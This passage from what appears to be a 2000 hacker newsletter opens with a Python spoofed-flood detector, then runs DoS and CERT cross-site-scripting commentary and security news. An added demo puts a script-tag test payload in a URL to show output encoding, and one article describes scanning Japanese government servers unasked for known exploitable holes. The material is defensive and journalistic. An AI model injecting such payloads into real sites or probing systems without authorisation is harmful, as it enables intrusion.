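    def observe(self, pkt: Packet) -> bool:
        """Record one packet; True means 'throttle traffic to this destination'."""
        q = self._recent[pkt.dst]
        q.append((pkt.ts, pkt.src))
        while q and pkt.ts - q[0][0] > self.window:   # expire old entries
            q.popleft()
        n = len(q)
        if n < self.threshold:
            return False
        distinct = len({src for _, src in q})
        return distinct / n >= self.distinct_ratio


def simulate() -> dict:
    """Constructed traffic: normal browsing, then a spoofed flood. Returns counts."""
    det = SpoofFloodDetector()
    legit_alerts = flood_alerts = 0
    # Phase 1: 100 packets in one second from five real clients (normal load).
    for i in range(100):
        legit_alerts += det.observe(Packet(f"10.0.0.{i % 5 + 1}", "198.51.100.10", i / 100))
    # Phase 2: 400 packets in one second, every one claiming a different source.
    for i in range(400):
        src = f"203.0.{i // 250}.{i % 250 + 1}"
        flood_alerts += det.observe(Packet(src, "198.51.100.10", 1.0 + i / 400))
    # The gateway check from the article: a real local host forwards, a forged one drops.
    egress = [egress_verdict(Packet("1.2.3.7", "198.51.100.10", 2.0)),
              egress_verdict(Packet("150.23.83.44", "198.51.100.10", 2.0))]
    return {"legit_alerts": legit_alerts, "flood_alerts": flood_alerts, "egress": egress}


if __name__ == "__main__":
    print(simulate())
```

The egress rule is the cheap one: it needs no state, only knowledge of the prefixes behind the router, and it stops forged packets at the launch point, exactly where the article wants them stopped. The window detector is the expensive one the article warns about, since it keeps state per destination and inspects every packet; the baseline rate would in practice be learned from the router's own history rather than hard-coded.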
Instead of blindly passing the packet on without question, routers should discriminate against suspicious packets by refusing to pass them on to the next router and setting off some kind of alarm for the administrator.

A second mechanism can be put into place that would help cut down on these attacks. On any given day, there is an average amount of traffic passed through any router. By monitoring these averages and applying other common sense rules, routers could be made to throttle heavily increased traffic. For example, if a router detected a sudden surge in traffic to a destination machine in which every packet claims to originate from a different IP address, that is a good sign of a saturation attack using spoofed packets. Rather than pass that traffic down the network, the router should throttle the traffic to avoid the likely flood that will ensue.

As stated many times before, easier said than done. Implementing these features falls on the many vendors of routers. Using these routers on production networks on the open Internet is up to the tens of thousands of companies maintaining a presence on the Internet. These upgrades cost time and money, something companies hesitate to invest until the first time they are on the receiving end of such an attack. Like most security incidents, companies tend to implement reactive security measures, rarely proactive measures.

Why Ask Why?

Somewhere along the way, everyone wants to know why such attacks are carried out. Using the recent series of attacks against Yahoo, eBay and others is as good an example as any. To quash the distant hopes of a reasonable explanation: "There is no good reason!" Consider that your typical DDoS attack affects hundreds (if not thousands) of machines, on a wide variety of networks. The single purpose of the attack is to cripple or shut down the target site so that it cannot receive legitimate traffic.
There are only a handful of reasons for doing it at all, none of which are reasonable or justifiable. In other words, DoS attacks are worthless and childish.

The first reason, with perhaps the longest history, is simple revenge. Some site out there wronged you in some way. Perhaps they spammed you, stopped hosting the free web pages they provided for you, fired your father or committed some other transgression. DoS attacks are a form of virtual revenge, especially against companies doing business over the Internet. The primary argument here is that these attacks cause problems for a number of ISPs, other customers who share bandwidth with the target, as well as the satisfied customers of the site. This goes back to the broadsword vs scalpel analogy.

The second reason has become rather trendy with novice script kiddies, second rate web page defacers, and those under the illusion they are part of the professional security community. "I did it to prove the system was vulnerable!" This is perhaps the most pathetic justification for launching a DoS attack. To many, this is no different than the attacker setting off a large nuclear device right next to a corporate server and then proclaiming "See! This can impact your operations!" Of course it can; this has been proven a hundred times over.

The third reason I can come up with falls back to playground rules. "If I can't play kickball, I'll throw the ball on the roof so no one else can play either!" This third grade mentality is far from justification of such attacks. Those wishing to exact some form of punishment against a site should consider the diminished intellect required to launch these attacks. There are better ways to deal with mean companies.

My Rant

Three types of people deserve the brunt of harsh insults and petty name calling. Each is responsible for this problem plaguing Internet users, and each could do their part to help stop it.
Each individual that carries out a DoS attack does so knowing full well what it could result in if they are caught. Practically nothing. There is precious little to deter someone from carrying out such vicious attacks. The very few times administrators put effort into tracking down a malicious user, it results in them getting ousted from the ISP. The next day, the offending user is back online accessing the Internet via another ISP.

Until the attack against Yahoo, the Federal Bureau of Investigation (FBI) was not concerned over these attacks. To date, the FBI has not managed to apprehend the perpetrator of a devastating DoS attack against their own home page (www.fbi.gov). For one reason or another they were seen as an annoyance, not a reason for loss of business. Law Enforcement needs to take a bigger interest in DoS attacks and start to punish those responsible. These types of attacks should take any competent law enforcement agent a few hours of tracking and maybe a handful of legitimate warrants.

Like the FBI, ISPs receiving these attacks need to take more proactive steps in preventing DoS attacks. When they do occur, ISPs should also take more time in tracking down the offending users and passing on the information to appropriate law enforcement. Rather than silently kicking them off the Internet for a day, taking a more active and public stance showing that malicious activity will not be tolerated would have a better effect. Those ISPs scared of retaliation need to remember that they are in the best position to stop the attackers.

Last, the pathetic kids (literally and figuratively) committing these attacks. In many cases, these attacks are launched with mystical scripts written in foreign languages that just produce the desired effect. There is no grace, no skill, and no intellect behind these attacks. You are not a hacker and you do not deserve respect for your childish actions.
You are no better than the twisted individuals who spray a crowd of innocent bystanders with a machine gun, only to nick your intended target. If you can't express yourself better than a saturation attack, and can't deal with being called a name or wronged somehow, seek help offline. You sorely need it.

Article: Brian Martin (bmartin@attrition.org)
Images: Dale Coddington (dalec@attrition.org)
http://www.attrition.org
Copyright 2000 Brian Martin

@HWA

72.0 HNN: Cert Warning? : what me worry?? - buffer overflow article
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

CERT warning? What, me worry?

By: Coris Neme

The February 3 announcement by CERT of a major security hole that affected all Web browsers so badly that they recommended wiping all cookies and browsing only known sites sounded bad--until I read the warning. I'm writing this article for one reason and one reason only: to dispel the FUD and hysteria of this ludicrous "warning". I've seen e-mail virus hoaxes that I was more inclined to panic about.

The supposed danger here, cross-site scripting, is that malicious JavaScript code could appear on a Web page, a newsgroup posting, or an e-mail. (Oh, my! The horror!) You might want to restrain your shock; this isn't news. Malicious scripts, unseen by the average user, have been possible since scripting languages came into being. Poison JavaScript and nasty Java applets are nothing new under the sun. CERT is basically telling us that it's 1996 again.

To be fair, the warning goes into a little more detail: It says that dynamically generated pages could launch JavaScript code unintentionally. Mr. Obvious, it's time for your wake-up call. Any page, dynamic or static or anything in between, can contain malicious code. But if you've disabled the scripting language that the code uses, it's irrelevant where the code came from.
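The "dynamically generated page" case the warning refers to, shown as an added Python example (not code from the article, from CERT or from any browser): a search page that echoes its q parameter back into the HTML it serves, once verbatim and once with output encoding. The URL, the page template and the helper names are constructed for the illustration.

```python
"""Added example: the reflected-input case behind the advisory the article discusses.

A server builds a page around text the visitor supplied in the URL. Echoed
verbatim, any markup in that text becomes part of the page the browser parses;
entity-encoded, the same text is rendered as text. URL and template constructed.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed page template; {term} is where the visitor's search text is echoed.
TEMPLATE = "<html><body><p>Results for: {term}</p></body></html>"


def search_term(url: str) -> str:
    """Pull the percent-decoded 'q' parameter out of a request URL."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_unsafe(term: str) -> str:
    """Echo the term as-is: whatever tags it contains become part of the page."""
    return TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the browser
    shows the term as text instead of interpreting it as markup."""
    return TEMPLATE.format(term=escape(term, quote=True))


def introduces_markup(page: str) -> bool:
    """True when the rendered page carries more tags than the template alone,
    i.e. the echoed input added markup of its own."""
    return page.count("<") > TEMPLATE.count("<")


def demo(url: str) -> dict:
    """Render both variants for one request and report which one added markup."""
    term = search_term(url)
    unsafe, safe = render_unsafe(term), render_safe(term)
    return {
        "term": term,
        "unsafe_adds_markup": introduces_markup(unsafe),
        "safe_adds_markup": introduces_markup(safe),
        "safe_page": safe,
    }


if __name__ == "__main__":
    # Constructed request carrying a script tag in the search parameter.
    print(demo("http://example.test/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"))
```

What the encoding buys on the server side is independent of any browser setting: the echoed text stays text in the served page, so the question of which site the script "came from" never arises for that page.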
Another point the CERT warning raises is that this so-called malicious code could hide in a frame and snoop data from another frame entirely. Sure, if your browser's buggy enough to allow such a thing. Dozens of such vulnerabilities have been removed from both Netscape and Internet Explorer; I think the threat of one frame spying on another is just about over. But hey, if it really was '96 all over again, they'd have an excellent point.

While we're on the subject, why do e-mail and news clients even support JavaScript, anyway? There's no legitimate purpose for it being there, after all, and it just serves as a way for someone to exploit the next big implementation bug that pops up. Had CERT posted a recommendation that all future browsers remove scripting capabilities from their e-mail and news clients, I think the hacking community would have stood up and applauded.

Shall we eradicate our entire cookie file, only browse the sites that are in our bookmarks, and never venture forth onto the Web again because of a sudden warning about a low-grade threat that's existed for nearly half a decade and for which many of the exploits have already been patched? The layman and the newbie are certainly being led to think so. I simply can't believe their recommended course of action--disable all scripting, don't browse promiscuously, and get rid of all your cookies. (I usually wipe most of my cookies anyway, but there are a few I keep.) I was surprised to see the news posted without so much as an editorial about how outdated and overblown the warning really is.

This is 2000, not 1996. Malicious code is still out there and yes, it still can get you; but about the most that it can do is overload your system and force a shutdown or a crash. (Poison JavaScript or Java that causes a crash is usually a self-solving problem. Such code can be found and eliminated; it's not stealthy.) It can't (usually) cause one frame to spy on another.
It can't just arbitrarily steal data from your hard drive. It's as dangerous and as harmless in static pages as in dynamically-generated pages.

I think it would be nice to read the news Monday and see that the media, instead of repeating the warning blindly, was now telling the world that the hacking community had denounced the CERT warning for the ridiculous paranoia it really is. Or failing that, perhaps we could get the blueprints to the time machine from whence this message came, and in turn we could deliver our own Chicken Little alerts about events that came and went many years ago. (Brace yourselves; I feel a 1987 coming on.)

Coris Neme

@HWA

73.0 HNN: The Japanese Panic Project - buffer overflow article
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

The Japanese Panic Project
Findings of a simple fifteen-minute security audit.
Written by YTCracker

Greetings from Colorado Springs. As you have probably heard by now, the Japanese government is panic-stricken following a few simple defacements of their government's websites. Damage control is quickly being administered to the sites in the limelight; however, the problems still stand.

McIntyre [of Attrition] and I were discussing the recent news uproar concerning the aforementioned defacements. He and I were curious if the Japanese government was either extremely secure or extremely ignored. I mounted up on my 486 [running console slack, you may phear now], fired up nmap and went at it, looking for anything that didn't look right. Anything that warranted a deeper investigation [checking the version of a daemon, running an rpcinfo query on a box] I accomplished using basic stock commands. Nothing extremely fancy or "zero-day", just the basics.

A few minutes into my audit of some of the top-level government websites, I discovered two vulnerabilities on the www.stat.co.jp website. Continuing on, I informed McIntyre of my findings.
Lo and behold, just a few hours after this extremely shallow security audit, the www.stat.go.jp site was defaced. I systematically ran through the sites on this list [found here] and my findings were pretty astounding. Many of these government sites contain vulnerabilities [several-year-old ones such as statd and qpop, along with newer vulnerabilities such as amd and sadmind] and run comparatively outdated operating systems [SunOS4]. I noticed gross violations of security relating to proxy servers with open permissions. On one site I noticed a cgi exploit dated about two years old. More than half of the NT servers I surveyed were exploitable by either eEye's stack bug or the now-infamous remote data service [msadc.pl] exploit.

These scans [COMPLETELY non-intrusive ;)] were an eye opener for me. I immediately asked myself why the Japanese government hadn't been experiencing defacements on a greater magnitude. I would assume that, for the most part, the United States' rash of defacements was largely attributed to the fact that NT was a popular choice among our government. It did take a little more digging to find out what the Japanese servers were vulnerable to. I seriously believe it's going to take a lot more than the help of a few individuals to turn this up.

Why is this such a big deal? I have no idea. This sort of thing happens every day at an exponential magnitude here in the United States. My guess as to why the Japanese government has been granted amnesty for so long by the defacement community is probably the fact that defacers didn't even really know those sites existed. However, now that these defacements have blown up and are in the public eye, I feel it is a matter of time before others follow suit. The preparedness level of the ITs involved seems extremely low and it seems way too late to begin a crash course in systems administration. There is no real solution to this problem.
Perhaps if preventative measures are quickly put into action [short of taking the sites offline], they have a good chance of averting some of the danger. The surprising factor is that in a fifteen minute period of goofing around, approximately three-fourths of the sites I checked had some exploitable feature. I informed who I could get a hold of. My fear is that if someone had obviously malicious intentions [i.e. the pro-Chinese, anti-Japanese hacktivist groups] and conducted a much more in-depth audit of the systems, they would find a lot more than I did. For now, damage control and politics are all that I expect to see for the next few days.

YTCracker (phed@felons.org)
(c)2000 YTCracker and sevenonenine

If you are the administrator of a Japanese government asset and would like me to report my findings in regards to your system, please don't hesitate to mail me at the address provided.

@HWA

74.0 HNN: Jan 31 Bulgarian Indicted for Cyber Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by William

Peter Iliev Pentchev, a native Bulgarian and former Princeton University student, was indicted by a federal grand jury in San Jose last Wednesday. He has been accused of breaking into the computer system of a Palo Alto e-commerce company and stealing approx. 1,800 credit card numbers in December of 1998. The unidentified company claimed damages of $100,000 after being forced to shut down their systems. If convicted, Pentchev faces a maximum penalty of 17 years in prison.

San Jose Mercury News
http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm

Posted at 8:53 p.m. PST Wednesday, January 26, 2000

Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria.
BY HOWARD MINTZ
Mercury News Staff Writer

A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities.

According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges.

The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers.

The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system.

Authorities have no evidence that Pentchev used the credit card numbers to commit fraud.

Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards.

In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. "He wasn't careful about mopping up after himself," Lee said.

Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter.

If convicted, Pentchev faces a maximum penalty of 17 years in prison.

Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.

@HWA

75.0 HNN: Jan 31: Online Banking Still Immature
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Evil Wench

MSNBC has a report that illustrates just how immature online banking is. The real scary part is that even if you don't use an online bank, criminals can still use your account information to steal your money. X.com, the bank used in this example, says that they have fixed all the problems.

MSNBC
http://www.msnbc.com/news/363440.asp

Online bank allowed easy scam
Automatic withdrawals in the spotlight as criminals stole with ‘help’ of legitimate finance Web sites

By Bob Sullivan
MSNBC

Jan. 28 — One day in mid January, Imad Khalidi arrived at work at his auto dealership in Maine to discover $21,000 had been removed from his company’s bank account. It had gone to pay for merchandise ordered from Gucci in San Francisco and was automatically deducted from Auto Europe’s account. That began a hellish 10 days for the company, which was caught in the middle of an online banking nightmare involving the newest Web bank, X.com. And it was not the only case of misappropriated funds surrounding the Web site.
SOMEONE HAD GOTTEN hold of Auto Europe’s bank account information and, after attempting a few fraudulent withdrawals, posted the information on the Internet. “Use this account for your x.com and Wingspan transfers,” the criminal wrote in an ominous post to a newsgroup after citing the account numbers. “Account has millions of dollars in funds, and can’t notice a mere US $25,000 a week debit. They get their statements quarterly.”

For the next 10 days, Khalidi said, there were four or five automatic withdrawals attempted daily by criminals using X.com or online banking competitor Wingspan. The original Gucci charge — and some of the subsequent charges to the Portland, Maine, company’s accounts — were funneled through online bill payment assistant CyberBills.com. CyberBills acknowledged its system was used in the attempted fraud but declined to offer details, citing an ongoing investigation. Wingspan did not immediately return phone calls.

In each case, the fraudulent charge was reversed by the company’s local bank — but the charges did get through the online companies, highlighting the security drawbacks that can come with convenient Internet banking.

X.com, which launched in mid-December, came under scrutiny Friday from a security group when a customer pointed out just how easy it was to trick the service into stealing money from someone else’s bank account. Users opening an X.com account were given the option to fund the account with a bank transfer, and only had to supply a bank account number and routing number — printed at the bottom of every check. This structure allowed X.com customers to easily withdraw money from victims’ accounts, and they did. One bragged on a newsgroup that he had lifted $4,500.

The company, which added security measures that stopped the scam Jan. 21, said it knows of only six bad charges, totaling less than $10,000.
CEO Bill Harris said there may be more victims who have not yet noticed fraudulent charges.

Word of the easy money started to spread on Internet newsgroups in early January, well before X.com addressed the flaw, as thieves bragged back and forth about their successful swindling. Harris conceded the company wasn’t aware of the cyber taunting. “I wouldn’t at all be surprised if we weren’t aware of what was in those newsgroups,” he said.

The ease with which criminals could withdraw money from victims’ accounts disturbed Elias Levy, who runs SecurityFocus.com, an Internet security information service. The Web site issued a release about the problem on Friday. “What’s most appalling is they said it ‘was a designed feature,’ ” Levy said. The company wanted to make online banking as simple as possible, so it allowed depositors to skip a step like sending in a voided check to verify their identity. “It was a calculated risk. Obviously they calculated wrong.”

Harris said a series of new company policies make X.com safe; it now only allows transfers between accounts held under the same name, for example. He said the changes have been well received by customers and stopped short of saying his company has committed a serious security snafu. “I don’t think a mistake was made,” he said. “If we had to do it all over again, I’m not sure we would start without a canceled check procedure.”

A spokesperson for Cyberbills said customers must provide physical proof they own an account before they are allowed to draw funds from it to pay bills.

But Khalidi was critical of X.com — and Wingspan and CyberBills — for acting slowly in response to his company’s crisis. “It took them more than one week (to stop the criminal activity),” he said. “The only reason they knew we were getting hit was because we told them.” CyberBills disputes that, saying it kept the account open during that time at Auto Europe’s request.
The company also claims to have discovered the scam itself using “internal security procedures.”

He believes the scam artist posted the account information on the Internet to flood it with fraudulent charges, creating a smoke screen that would make tracking the criminal harder for investigators.

Auto Europe’s Net experience should be a lesson to other businesses, he said. Even if they have no dealings at all on the Internet, they can still be a victim of an Internet scam. “As long as you are vigilant you can protect yourself,” he said. “We check our accounts every day.”

@HWA

76.0 HNN: Jan 31: E-Mail Scanning System In Progress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by maierj

Lockheed Martin Energy Systems is progressing on the Ferret project, an artificial-intelligence concept that's being developed at the Y-12 nuclear weapons plant in Tennessee. It is hoped that Ferret will help prevent the inadvertent, accidental release of classified information through email by scanning it for key words.

ABC News
http://abcnews.go.com/sections/tech/DailyNews/Ferrets_000126.html

Ferreting Out Spies
Program To Detect Classified Information In E-Mail

By Frank Munger
Scripps Howard News Service

KNOXVILLE, Tenn., Jan. 26 — Work reportedly is progressing toward an autumn pilot project with Ferret, an artificial-intelligence concept that’s being developed at the Y-12 nuclear weapons plant to scan e-mail for classified information.

“Right now we seem to be pretty much on track,” said Peter Kortman, program manager at Lockheed Martin Energy Systems, the contractor operating Y-12 for the federal government.

Still in Initial Stages

“We’re still in the initial stages, and the tough issues are being ferreted out (pun intended, presumably),” Kortman said.
One of the issues being addressed is how Ferret (formerly called Pherret) deals with the informal lingo sometimes used in e-mail. Apparently the system does quite well with the language used in formal documents and technical reports.

The initial use for Ferret would be to scan reports or messages that involve information related to nuclear weapons. It would help ensure that the information to be released freely and publicly does not contain classified matter.

Interestingly, the Ferret system can only be used on classified computer systems, according to Kortman. Why? Kortman explains: “In order to detect classified information, you have to have a pretty good idea of what it is. Therefore, that means the Ferret structure and knowledge base is really classified.”

Therefore, if Ferret was set up on an unclassified system, some clever person might be able to ask questions, play with information and phrase things differently until ultimately concluding — through trial and error — that certain items are classified.

Determining Ferret Likes, Dislikes

“You could determine from your questions what Ferret likes and what Ferret doesn’t like,” Kortman said.

One of the time-consuming tasks associated with a prototype system like Ferret is feeding it information to help develop a knowledge base. That involves going rule by rule in classification guides, topic by topic, trying to incorporate as many descriptions of the same information as possible. Once that information is there, however, Ferret has the capability to interpret and identify much, much more in terms of concepts and word relationships.

“We have a weapons expert working with us ... and using his experience and expertise to ask Ferret different types of questions,” Kortman said.

It’s impossible, of course, to make a system foolproof because there are so many ways of saying things, and Ferret won’t break down codes and muzzle spies.
Its main task is to help prevent the inadvertent, accidental release of classified information. But this little slice of artificial intelligence is expected to do that task at least as well as some of the plant’s top classification reviewers and probably do it a lot faster.

“What we’re finding is that Ferret does remarkably well,” Kortman said. “I’m very happy with it.”

In a recent issue of Lockheed Martin Today, the developers of Ferret offered a simple description of how the system works:

Protecting Classified Recipes

Suppose you run a restaurant and want to protect the fact that the secret ingredient in your hugely popular coffee pastries is cappuccino. In making up a new menu, your assistant pens this description of the pastries: “Our chef highly recommends his deliciously moist chocolate cake imbued with the richness and warmth of strong, creamy coffee.”

Makes you want one on the spot, but would Ferret like it? Let’s see.

Ferret would “know” that cake is a pastry. It also would know that cappuccino is generally espresso with extra milk or cream and chocolate added. It associates “creamy” with extra cream or milk, and it is reasonably sure, in a restaurant context, that “strong” and “coffee” together implies “espresso.”

Voila! Ferret concludes that your menu suggests pastry with cappuccino and, hence, that it contains “classified information.” Send that menu back to the kitchen!

@HWA

77.0 HNN: Jan 31: USA Today Headlines Changed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Code Kid

While this was not a web page defacement, similarities can be drawn. Boston, New York, Washington, Denver and San Francisco had some copies of the USA Today paper wrapped in a fake masthead. The fake front page read USA Decay and had headlines like "Pentagon to Throw Bombs Away," and "Defense, Education Departments to Merge." A peace activist organization known as Shiftdough.org claimed responsibility.
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500160075-500200480-500894258-0,00.html

Group puts fake front page on USA Today

Copyright © 2000 Nando Media
Copyright © 2000 APonline

By BRIGITTE GREENBERG

WASHINGTON (January 27, 2000 6:35 p.m. EST http://www.nandotimes.com) - Some readers who bought copies of USA Today on Thursday did double-takes after a group of peace activists wrapped some papers in a fake front page with the masthead: "USA Decay."

Officials with USA Today said they did not know how many streetside newspaper boxes had been targeted or how many newspapers were affected, but the group claimed to have hit boxes in nine cities, including Boston, New York, Washington, Denver and San Francisco.

The organization that claimed responsibility calls itself Shiftdough.org. In a press release, the group described its members as a "collection of activists who call for shifting dough out of the Pentagon budget and into human needs," such as education, health care and the environment.

The release gave no information on how to contact the members, and on the Web site, they acknowledge trying to conceal their identities. The site is hosted by a Burlington, Vt., company and is registered to Michael Dorfman of Floro, Norway.

"I set up the Web site and put together the list of the links. That was my contribution, but I was not involved at all in this newspaper action," Dorfman said Thursday when contacted by phone. "Shiftdough is kind of a loose affiliation of activists. I definitely support what it stands for."

But Dorfman said he did not know how many people were members of the group, how many newspaper boxes had been hit, or who was responsible for altering the newspapers.

Bob Dubill, executive editor of USA Today, said the newspaper's lawyers were checking whether the group's action was a violation of any state or federal laws. He said he learned of the mock pages from readers and employees.
"We're looking into the matter," said Dubill, declining to comment further.

The fake front page, made to resemble the real thing, probably would not have fooled anyone for long. One headline read "Pentagon to Throw Bombs Away," and another was "Defense, Education Departments to Merge." The "Newsline section" of the real paper was renamed "Newslime."

The spoof of the newspaper also offered the following travel tip: "Call your travel agent to see if your destination country is currently in the process of being bombed by the USA."

@HWA

78.0 HNN: Jan 31: @Stake and L0pht
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Code Kid
The merger of hacker think tank L0pht Heavy Industries with security consulting company @Stake Inc. is still making news. CNN has some video with a rare look inside the L0pht laboratories; they ask the question of whether L0pht has 'sold out?' (I guess we will just have to wait and see.)

CNN
http://www.cnn.com/2000/TECH/computing/01/27/hackers.t_t/index.html

Is L0pht selling out?

January 27, 2000
Web posted at: 3:34 p.m. EST (2034 GMT)

(CNN) -- The L0pht Heavy Industries hacker think-tank made headlines recently, announcing it was going corporate. The group will join with some high-tech executives to form @Stake, a computer security services provider. CNN Science Correspondent Ann Kellan checks in with L0pht and wonders if the corporate image will change their lofty goals.

(Go to site for video stream.)

@HWA

79.0 HNN: Jan 31: Book Review: Database Nation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Sarge
Simson Garfinkel's "Database Nation: The Death of Privacy in the 21st Century" says that capitalism, the free market, advanced technology, and the unbridled exchange of electronic information are assaulting the privacy of American citizens. (Definitely an eye opener.)
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500160969-500202162-500892705-0,00.html

Database Nation
http://www.databasenation.com/home.htm

Nando;

(Site spewed raw HTML data at me, if anything is messed up blame me, k? k. - Ed)

(January 30, 2000 12:14 a.m. EST) - A few days ago, I picked up a new computer modem at a local retailer. As the sales clerk was preparing a receipt, she asked for my Social Security number. When I asked her why she needed that, she told me it was "policy." I politely told her that I did not want to give it to her. She seemed surprised and then dashed away to confer with a superior. When she returned, she told me my number would not be needed.

The sales clerk had technically not done anything illegal - she had just asked for my Social Security number. If I had given it to her, her company, part of a national chain, would have had access to scads of information about me that has nothing to do with computer modems, but that they might have been able to sell to other businesses eager for details on my credit history and buying habits.

It's just this kind of "policy" that is at the heart of Simson Garfinkel's "Database Nation: The Death of Privacy in the 21st Century."

Garfinkel, who wrote about technology for the Christian Science Monitor in the early 1990s, argues convincingly that our privacy is under assault from a variety of sources, including government agencies, talented computer-geek teens next door (or in Timbuktu!), but most consistently from "capitalism, the free market, advanced technology, and the unbridled exchange of electronic information."

O'Reilly Books, the publisher of "Database Nation," compares it to Rachel Carson's "Silent Spring," the book that almost single-handedly started the environmental movement in the '60s. Garfinkel is not the elegant writer that Carson is, but it's still not a bad comparison.
While issues of privacy have been debated far more today than environmental concerns were in Carson's era, Garfinkel is the first to decisively and persuasively marshal all the information to show how privacy is under constant attack, often by people who claim to have our best interests at heart.

It's this emphasis on the role that capitalism and the free market play in diminishing our privacy in the name of making money that will no doubt upset the most people. But as Garfinkel writes, the evidence can't be ignored. These days, advertisers, venture capitalists, and marketers demand more and more personal information about customers before they'll advertise in the media, or back a new start-up, or invest in an established company.

Consequently, we're being asked for more and more personal information from corner stores, online retailers and mail-order firms. Sometimes that information is gathered without our permission, as shown by the recent Electronic Privacy Information Center report on online retailers. (Not a single firm in the top 100 online retailers had adequate privacy protection practices, and several dozen employed ads that track your movements online even after you've left their site.)

What I enjoyed most about "Database Nation" was Garfinkel's ability to write about privacy issues without ranting or raving. The picture he paints is clear, sharp, and focused - a wake-up call rather than a fire alarm.

And unlike many authors who only point to problems, Garfinkel offers sound advice about alternatives to many privacy-damaging practices. For instance, he acknowledges the importance of protecting the public against acts of terrorism. But he says this can be done without infringing on the rights of private citizens or casting a wide net of suspicion over an entire ethnic or religious group. What is required, he writes, is careful planning and thoughtfulness about difficult issues - something most government and private organizations are not willing to do.
But Garfinkel's most interesting and probably most controversial thesis is that government, rather than being the Big Brother of George Orwell's "1984," is the average citizen's best friend in the fight to protect privacy - and that vigorous, muscular legislation, as opposed to voluntary standards, is the best way to protect citizens' rights.

Garfinkel's book comes at a good time. Many experts believe that privacy and security issues will ultimately dwarf the Y2K hysteria of the past two years. "Database Nation" gives a way to detect the privacy land mines in our culture and ultimately disarm them.

DATABASE NATION. By Simson Garfinkel. O'Reilly Books. 320 pages, $24.95

Tom Regan is associate editor of The Christian Science Monitor's Electronic Edition. You can e-mail him at tom@csmonitor.com

-=-

Database Nation;
http://www.databasenation.com/home.htm

The book.

@HWA

80.0 HNN: Feb 1st: Interview with DeCSS Author
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Apocalypse Dow
Jon Johansen, the 16-year-old Norwegian member of the Masters of Reverse Engineering (MoRE) and co-author of DeCSS, has given an interview to "Linux World". Definitely a good interview that sheds some light on the whole case. (Especially liked the part about him backing up the source code to his cell phone.)

CNN
http://www.cnn.com/2000/TECH/computing/01/31/johansen.interview.idg/index.html

OpenDVD.org
http://www.opendvd.org

CNN: (Interview)

Meet the kid behind the DVD hack

January 31, 2000
Web posted at: 11:03 a.m. EST (1603 GMT)

by J.S. Kelly

(IDG) -- On Monday, January 24, authorities in Norway searched the home of Jon Johansen, a 16-year-old Norwegian member of the Masters of Reverse Engineering (MoRE) -- the group which created the DeCSS DVD playback utility for Linux. Jon and his father Per Johansen have both been indicted by Norway's Department of Economic Crime.
LinuxWorld talked to Jon about DeCSS, the investigation, the controversy -- and about why he feels that this case is at the same time so ridiculous and so important.

LinuxWorld: How did this whole thing start? How did you get involved with DVD and DeCSS?

Jon Johansen: Well, I got involved with DVD about two years ago. I bought my first DVD-ROM and an MPEG-2 decoder card. And, about at the end of September last year, I got in contact with a German computer programmer and a Dutch computer programmer, and we decided that it was time to add DVD support to Linux -- and, of course, to other operating systems, such as FreeBSD.

LinuxWorld: Had you expected any problems like this when you set about to make the player?

Jon Johansen: We knew that they would probably go after someone. But when [Norwegian authorities] visited me yesterday with a search warrant, I really hadn't expected them to, because it's been about two or three months now since [the subject] first appeared in the media and, well, to me, that's a pretty long time.

LinuxWorld: You removed the code from your Webpages when they asked you to, and have been cooperating with what they have asked of you, is that right?

Jon Johansen: Actually, I was only linking [to the source code] and they wanted me to remove the link -- which I did, so that I could think it over. And then the link appeared again on my Website at the end of the week.

